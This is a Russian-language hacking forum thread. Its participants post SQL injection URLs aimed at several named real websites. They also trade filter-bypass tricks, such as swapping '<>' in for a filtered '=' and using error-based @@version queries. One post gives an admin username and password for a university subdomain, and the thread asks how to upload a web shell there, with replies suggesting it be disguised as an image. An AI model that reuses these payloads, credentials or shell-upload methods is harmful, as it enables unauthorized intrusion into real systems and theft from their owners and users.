_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*

Тут к information_schema нет прав. Это значит, надо брутить имена талиц и столбцов. Я б SIPTом пробежал, по словарю.

Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.

http://www.bookstreet.ru/prod_show.php?object_uid=2'

Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)

помогите раскрутить (:
http://www.danieldefo.ru/gallery.html?top=1'
Она слепая?)

http://siovizcenter.ucsd.edu/admin/
rnewman:hot98DOG

Как сюда шелл залить? Возможно?

http://www.bookstreet.ru/prod_show.php?object_uid=2+order+by+2--
если больше 2 - то ошибка
а дальше вот что
'=' - режет
'select' -режет (видно из запроса http://www.bookstreet.ru/prod_show.php?object_uid=2+union+select+1,2'-- )
как видно SELECT в запросе убран

тк = режется использовать можно <>

http://www.bookstreet.ru/prod_show.php?object_uid=2+and+1<>@@version--
а дальше читай тут

http://injection.rulezz.ru/MSSQL-ASP-Injection.html

+++AndreyDevil+++, не смотрел. но попробуй залить как картинку, или побалуйся с расширением файла.
sj666, какая ж она слепая?))
версия бд - 4.0.27-log. а инф.схема появляеться только в пятой.

faza02,дело в том что он заливает .php но при переходе link становится такого вида http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=223 и предлагает мне скачать шелл )

значит ищи в attachements ... я щас просто на работе, был бы дома проверил бы сам все ...